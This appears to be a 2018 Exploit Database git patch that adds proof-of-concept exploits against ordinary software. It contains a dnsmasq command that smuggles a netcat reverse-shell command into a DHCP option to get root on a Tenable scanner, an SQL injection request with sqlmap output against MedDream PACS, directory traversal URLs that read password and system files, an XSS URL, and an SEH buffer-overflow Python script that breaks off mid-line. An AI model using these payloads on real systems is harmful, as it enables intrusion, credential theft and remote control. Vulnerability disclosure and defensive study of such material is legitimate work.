From 76af808136a9177e9932fcaaf54fc71522f763a9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 8 Sep 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-09-08 6 changes to exploits/shellcodes DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH) iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH) Tenable WAS-Scanner 7.4.1708 - Remote Command Execution D-Link Dir-600M N150 - Cross-Site Scripting MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal QNAP Photo Station 5.7.0 - Cross-Site Scripting --- exploits/hardware/webapps/45348.txt | 13 ++++++++ exploits/linux/remote/45345.txt | 28 ++++++++++++++++ exploits/php/webapps/45344.txt | 44 ++++++++++++++++++++++++ exploits/php/webapps/45347.txt | 17 ++++++++++ exploits/windows/local/45346.py | 47 ++++++++++++++++++++++++++ exploits/windows_x86/local/45349.py | 52 +++++++++++++++++++++++++++++ files_exploits.csv | 8 ++++- 7 files changed, 208 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/webapps/45348.txt create mode 100644 exploits/linux/remote/45345.txt create mode 100644 exploits/php/webapps/45344.txt create mode 100644 exploits/php/webapps/45347.txt create mode 100755 exploits/windows/local/45346.py create mode 100755 exploits/windows_x86/local/45349.py diff --git a/exploits/hardware/webapps/45348.txt b/exploits/hardware/webapps/45348.txt new file mode 100644 index 000000000..805b8a1e0 --- /dev/null +++ b/exploits/hardware/webapps/45348.txt @@ -0,0 +1,13 @@ +# Exploit Title: QNAP Photo Station 5.7.0 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-09-07 +# Exploit Author: Mitsuaki (Mitch) Shiraishi - secureworks +# Vendor Homepage: https://www.qnap.com/ja-jp/security-advisory/nas-201808-23 +# Software Link: N/A +# Version: QNAP Photo Station versions 5.7.0 and earlier +# Tested on: N/A +# CVE : CVE-2018-0715 + +# PoC: + +https://***.***.***.***:8080/photo/abc/.txt \ No newline at end of file diff --git a/exploits/linux/remote/45345.txt b/exploits/linux/remote/45345.txt new file mode 100644 index 000000000..ea1b4d3d4 --- /dev/null +++ b/exploits/linux/remote/45345.txt @@ -0,0 +1,28 @@ +# Exploit Title: Tenable WAS-Scanner 7.4.1708 - Remote Command Execution +# Discovery by: Sameer Goyal +# Discovery Date: 2018-05-30 +# Vendor Homepage: https://www.tenable.com/ +# Software Link: https://www.tenable.com/products/tenable-io/web-application-scanning +# Tested Version: WAS-20180328 +# Vulnerability Type: Remote Command Execution (RCE) +# Tested on OS: CentOS 7.4.1708 +# Vulnerable daemon version: NetworkManager 1.8.0-11.el7_4 + +# Steps to produce the RCE: + +# Step 1: Setup your malicious DHCP server in the network using dnsmasq: + +dnsmasq --interface=eth1 --bind-interfaces --except-interface=lo --dhcp-range=192.168.51.21,192.168.51.25,1h --conf-file=/dev/null --dhcp-option=6,192.168.51.1 --dhcp-option=3,192.168.51.1 --dhcp-option="252,x'&/home/wizard/nc -nv 192.168.51.1 5555 -e /bin/bash #" + +# DHCP-option-3 => gateway IP/ DHCP server IP. +# DHCP-option-6 => DNS IP, which can be same as gateway IP( not mandatory) +# DHCP-range => simply subnet range (1h, for 1 hour only) +# DHCP option=> ì252,xí& #î + +# Start the listener on port 5555 on other terminal . +# Step 2: Send the normal IP request to the malicious DHCP server from the victim machine. + +nmcli con up ìWired Connection 1î && ifconfig + +# Step 3: Check the listener, we have got the reverse shell with root privileges. +# Reference: https://www.exploit-db.com/docs/english/45334-obtaining-command-execution-through-the-networkmanager-daemon.pdf \ No newline at end of file diff --git a/exploits/php/webapps/45344.txt b/exploits/php/webapps/45344.txt new file mode 100644 index 000000000..1cb307990 --- /dev/null +++ b/exploits/php/webapps/45344.txt @@ -0,0 +1,44 @@ +# Exploit Title: MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection +# Date: 2018-05-23 +# Software https://www.softneta.com/products/meddream-pacs-server/downloads.html +# Version: MedDreamPACS Premium 6.7.1.1 +# Exploit Author: Carlos Avila +# Google Dork: inurl:Pacs/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login +# Category: webapps +# Tested on: Windows +# http://twitter.com/badboy_nt + +# Proof of Concept + +POST /Pacs/userSignup.php HTTP/1.1 +Host: 192.168.6.107 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.6.107/Pacs/userSignup.php?hostname=localhost&database=dicom +Content-Type: application/x-www-form-urlencoded +Content-Length: 129 +Cookie: PHPSESSID=4l1c7irpgk1apcqk7ll9d89104 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +hostname=localhost&database=dicom&username=hi&password=hi&firstname=jh&lastname=k23klk3l2&email=test@gmail.com&action=Sign+Up + +# Parameters affected: email, username + +root@deb-17-3:~/meddream# sqlmap -r sqli-signup -f -p email --dbms mysql --dbs + +[10:23:16] [INFO] testing MySQL +[10:23:16] [INFO] confirming MySQL +[10:23:16] [INFO] the back-end DBMS is MySQL +web application technology: Apache, PHP 7.0.30 +back-end DBMS: MySQL >= 5.0.0 +[10:23:16] [INFO] fetching database names +[10:23:16] [INFO] used SQL query returns 2 entries +[10:23:16] [INFO] resumed: information_schema +[10:23:16] [INFO] resumed: dicom +available databases [2]: +[*] dicom +[*] information_schema \ No newline at end of file diff --git a/exploits/php/webapps/45347.txt b/exploits/php/webapps/45347.txt new file mode 100644 index 000000000..37e4f1fd9 --- /dev/null +++ b/exploits/php/webapps/45347.txt @@ -0,0 +1,17 @@ +# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal +# Date: 2018-05-23 +# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html +# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login +# Version: MedDream PACS Server Premium 6.7.1.1 +# Category: webapps +# Tested on: Windows 7 +# Exploit Author: Carlos Avila +# Contact: http://twitter.com/badboy_nt + +# Proof of Concept + +http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini + +http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts + +http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- ) \ No newline at end of file diff --git a/exploits/windows/local/45346.py b/exploits/windows/local/45346.py new file mode 100755 index 000000000..c4873b78f --- /dev/null +++ b/exploits/windows/local/45346.py @@ -0,0 +1,47 @@ +# Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH) +# Date: 2018-09-06 +# Exploit Author:T3jv1l +# Vendor Homepage:http://www.dvd-photo-slideshow.com/ +# Software:www.dvd-photo-slideshow.com/dps_install.exe +# Category:Local +# Contact:https://twitter.com/T3jv1l +# Version: DVD Photo Slideshow Professional 8.07 +# Tested on: Windows 7 SP1 x86 +# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ + +#!/bin/python + +print""" +#1. Download and install the setup file +#2. Run this exploit code via python 2.7 +#3. A file "Evil.txt" will be created +#4. Click Help > Register... in tool bar +#5. Copy the contents of the file (Evil.txt)and paste in the Registration Name field +#6. Click Activate and BOOMMMM !!!! """ + +import struct + +junk_byte = "A" * 256 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack("